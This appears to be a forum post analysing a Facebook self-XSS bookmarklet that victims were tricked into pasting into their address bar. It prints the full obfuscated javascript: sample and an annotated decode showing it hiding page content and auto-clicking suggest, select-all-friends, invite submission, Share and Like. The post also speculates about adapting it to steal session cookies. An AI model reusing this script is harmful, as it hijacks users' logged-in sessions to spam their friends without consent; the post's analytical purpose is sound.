// Sample under analysis: a "paste this into your address bar" javascript: URL (self-XSS).
// Pasted that way, it runs with the page's origin and the user's logged-in session.
// Layout: five implicit globals hold app107489592636080_* element ids; _0xa049 is a
// hex-escaped string table, and every property name and DOM id is fetched from it by
// index, so no readable API name appears in the text. An `_0x...` array combined with
// bracket indexing is a useful triage signal for machine-obfuscated script.
// Decoded table, by index: 0 visibility, 1 style, 2 getElementById, 3 hidden,
// 4 innerHTML, 5 value, 6 click, 7 suggest, 8 select_all, 9 sgm_invite_form,
// 10 /ajax/social_graph/invite_dialog.php, 11 submitDialog, 12 slink, 13 input,
// 14 getElementsByTagName, 15 Share, 16 likeme.
// Behaviour: hides one element, copies one element's `value` into another element's
// innerHTML, clicks "suggest", then uses nested setTimeout calls (5 s, 5 s, 3 s, 3 s, 5 s)
// to call fs.select_all(), SocialGraphManager.submitDialog(...), click "slink", click
// every <input> whose value is "Share", and click "likeme".
// The table contains no cookie accessor and no off-site URL: everything is done by
// driving the page's own controls. fs and SocialGraphManager are not defined here;
// presumably they are globals supplied by the host page — confirm.
javascript:(function(){a='app107489592636080_qjPdbG';b='app107489592636080_asAbCy';hWBkWd='app107489592636080_hWBkWd';RsApSf='app107489592636080_RsApSf';CXyYOD='app107489592636080_CXyYOD';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](CXyYOD)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](RsApSf)[_0xa049[4]]=d[_0xa049[2]](hWBkWd)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();
Obfuscated Javascript injection. So I whipped up a simple app to translate the hexcode; there was still a lot of obfuscation involving arrays and whatnot. After sorting through all of that, I got the following:
// Analyst's hand-decoded transcription of the obfuscated bookmarklet. The decoded
// string-table entries are written without quotes, so this is a reading aid rather
// than runnable code.
// NOTE(review): the app107489592636080_* ids and the lower-case `share` here differ
// from the obfuscated sample (which decodes to "Share"); presumably this was
// transcribed from another capture of the same script — confirm.
// Nothing below reads cookies or contacts another host; every step drives a control
// or function that already exists on the page, using the logged-in user's session.
javascript
:(
function()
{
// Step 0 (immediately): hide one element, then overwrite another element's markup
// with the `value` of a third element. Presumably this swaps the visible page
// content while the automation runs — confirm.
document[getElementById](app107489592636080_ERqmQz)[style][visibility]=hidden;
document[getElementById](app107489592636080_pxnzBW)[innerHTML]=document[getElementById](app107489592636080_FqafMk)[value];
// Click the element with id "suggest" (presumably opens the suggest-to-friends dialog).
document[getElementById](suggest)[click]();
// Timer A, 5 s after start: fs.select_all(). `fs` is not defined in this script;
// presumably the page's friend selector — confirm.
setTimeout
(
function ()
{
fs[select_all]();
}
,5000
);
// Timer B, also 5 s after start (registered after timer A): submit the invite form
// through the page's own SocialGraphManager.submitDialog, then chain the later steps.
setTimeout
(
function ()
{
SocialGraphManager[submitDialog](sgm_invite_form,/ajax/social_graph/invite_dialog.php);
// 3 s later: click the element with id "slink".
setTimeout
(
function ()
{
document[getElementById](slink)[click]();
// 3 s later: click every <input> whose value matches the Share label.
// `inp` and `i` are implicit globals; for-in also walks the collection's
// non-index properties, which simply fail the value comparison.
setTimeout
(
function ()
{
inp=document[getElementsByTagName](input);
for(i in inp)
{
if( inp[i][value]==share )
{
inp[i][click]();
}
;}
;
// 5 s later: click the element with id "likeme", then rewrite a second
// element's markup from another element's `value`.
setTimeout
(
function ()
{
document[getElementById](likeme)[click]();
document[getElementById](app107489592636080_tsypQz)[innerHTML]=document[getElementById](app107489592636080_AKgead)[value];}
,5000
);
}
,3000
);
}
,3000
);
}
,5000
);
}
)();
My preliminary guess is that this is just a simple injection that causes users to "Like" the page and "Suggest" it to friends. I'm not particularly familiar with the exact constructs that Facebook uses (referring to the "app107489592636080_pxnzBW" garbage and whatnot), so if anyone wants to clarify exactly what this code does that would be cool.
Does anyone have any thoughts on this? The page has since been deleted, but it had nearly 600,000 fans. I'm personally thinking that this code could easily be modified to send users' cookies to a remote server that would then hijack the user's session (there is at least one tool available for this purpose, found here). If that's the case, does anyone else think this would be worthy of Facebook addressing? I know GMail sessions used to be easily hijacked, and I'm pretty sure Google fixed that by adding some form of server-side IP address verification.
My main concern is that nearly 600K people were fooled into injecting javascript into their own browsers.
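EDIT: I looked at this some more. Turns out you couldn't use JS to capture the necessary cookies to hijack a FB session on most browsers, thanks to FB's use of the HttpOnly flag. But still: HttpOnly only stops script from reading the cookie. Pasted code still runs inside the logged-in session and can click or submit anything the user can, which is all this script needs.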





